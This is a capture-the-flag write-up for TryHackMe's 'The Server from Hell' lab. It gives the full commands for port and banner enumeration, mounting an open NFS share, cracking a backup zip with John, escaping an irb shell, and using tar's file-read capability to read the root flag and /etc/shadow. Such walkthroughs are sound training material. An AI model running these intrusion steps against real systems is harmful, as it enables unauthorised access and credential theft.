Introduction

Face a server that feels as if it was configured and deployed by Satan himself. Can you escalate to root?.

This is The Server from Hell from TryHackMe.

The only instruction says:

Start at port 1337 and enumerate your way.

I started an nmap scan but there was port spoofing turned on so I quickly cancelled it.

1337

nmap on port 1337 says:

PORT STATE SERVICE VERSION
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| Welcome traveller, to the beginning of your journey
| begin, find the trollface
| Legend says he’s hiding in the first 100 ports
|_ printing the banners from the ports

So I run a command to get the banners from the first 100 ports:

root@kali:/opt/tryhackme/hellserver# nmap -p1-100 -sV --script=banner 10.10.179.4

In amongst the nonsense I notice this:

21/tcp open ftp?
| banner: 550 12345 0f7000f800770008777 go to port 12345 80008f7f700880cf

12345

In the browser at port 12345 we get this message:

NFS shares are cool, especially when they are misconfigured
It’s on the standard port, no need for another scan

NFS

We can mount the share and download the contents - a zip file. It’s password protected but John handles it easily:

root@kali:/opt/tryhackme/hellserver# mount -t nfs 10.10.179.4:/ mountpoint/
root@kali:/opt/tryhackme/hellserver/mountpoint/home/nfs# cp backup.zip /opt/tryhackme/hellserver/backup.zip

root@kali:/opt/tryhackme/hellserver# zip2john backup.zip > backup.john
backup.zip/home/hades/.ssh/ is not encrypted!
ver 1.0 backup.zip/home/hades/.ssh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=2107, decmplen=3369, crc=6F72D66B
ver 1.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/hint.txt PKZIP Encr: 2b chk, TS_chk, cmplen=22, decmplen=10, crc=F51A7381
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/authorized_keys PKZIP Encr: 2b chk, TS_chk, cmplen=602, decmplen=736, crc=1C4C509B
ver 1.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/flag.txt PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=2F9682FA
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/id_rsa.pub PKZIP Encr: 2b chk, TS_chk, cmplen=602, decmplen=736, crc=1C4C509B
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
root@kali:/opt/tryhackme/hellserver# john backup.john -w=/usr/share/wordlists/rockyou.txt

Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
zxcvbnm          (backup.zip)
1g 0:00:00:00 DONE (2020-11-03 07:41) 10.00g/s 81920p/s 81920c/s 81920C/s 123456..total90
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Right, so we got some SSH keys, a hint and a flag. The hint just says:

2500-4500

Presumably we need to identify the correct port for SSH.

SSH

I run this nmap scan:

root@kali:/opt/tryhackme/hellserver# nmap -T4 -p2500-4500 -sV -sC 10.10.179.4 -oA nmap/tcp_ssh_search

It takes quite a while, but when it’s done I grep the results for SSH and find the port - 3333.

root@kali:/opt/tryhackme/hellserver/nmap# cat tcp_ssh_search.nmap | grep ssh
3333/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:

Then I can log in as hades

root@kali:/opt/tryhackme/hellserver# ssh -p 3333 -i home/hades/.ssh/id_rsa hades@10.10.179.4

irb

We’re in a shell which I haven’t seen before - the prompt is irb. Google tells me it’s interactive ruby. I lookup how to list and read files to get user.txt:

irb(main):002:0> Dir.entries(".")
=> ["..", ".bashrc", ".ssh", "user.txt", ".", ".profile", ".bash_logout"]
irb(main):003:0> txt = File.open("user.txt")
=> #<File:user.txt>

irb(main):004:0> puts txt.read()
thm{sh3ll_3c4p3_15_v3ry_1337}

That’s all well and good but let’s get out:

irb(main):006:0> exec '/bin/bash'

And we have a normal bash shell.

Privesc, of sorts

I ran linpeas and it said that tar had the capability CAP_DAC_READ_SEARCH which can Bypass file read permission checks and directory read and execute permission checks. So we can read the root flag with that (per GTFOBins):

tar xf "/root/root.txt" -I '/bin/sh -c "cat 1>&2"'

And that gets the flag but it doesn’t make us root. I also read /etc/shadow and grabbed the hash so maybe that could be broken - I didn’t try. I checked a couple of other people’s writeups at this point to see if any of them had a way to use tar to actually become root, but none of them had - they all just read the flag like I did. So I guess it’s done.